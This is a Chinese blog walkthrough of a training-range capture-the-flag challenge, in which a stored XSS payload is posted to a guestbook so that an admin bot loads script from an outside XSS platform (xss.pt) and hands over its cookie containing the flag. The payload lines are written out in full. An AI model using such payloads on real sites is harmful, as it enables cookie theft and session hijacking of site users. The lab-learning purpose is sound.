其他分享
首页 > 其他分享> > 封神台靶场:第四章:为了更多的权限!留言板!【配套课时:cookie伪造目标权限 实战演练】

封神台靶场:第四章:为了更多的权限!留言板!【配套课时:cookie伪造目标权限 实战演练】

作者:互联网

Tips: 1、存储型Xss
2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面
3、自建Xss平台源码:http://www.zkaq.org/?t/99.html

经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站!
他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。
尤里开始动手……

靶场地址

http://59.63.200.79:8004/Feedback.asp
留言框输入
<script>alert('123')</script>

 

 弹窗成功

发现留言框可以注入,存在注入点
在线xss平台  https://xss.pt/ 

注册完成之后,创建项目

 

 点击下一步,完成创建!!!

找到这个链接

 

 用上面的链接进行xss存储型注入

在留言反馈的内容那里进行注入,注入代码如下
 <script src=https://xss.pt/F672></script>

注入完成之后,需要等待一段时间。大概10分钟左右吧,就会收到网站的回复啦。

 

 展开查看,发现flag

 

标签:xss,神台,留言,flag,cookie,权限,留言板,注入
来源: https://www.cnblogs.com/Xshun-z/p/13977912.html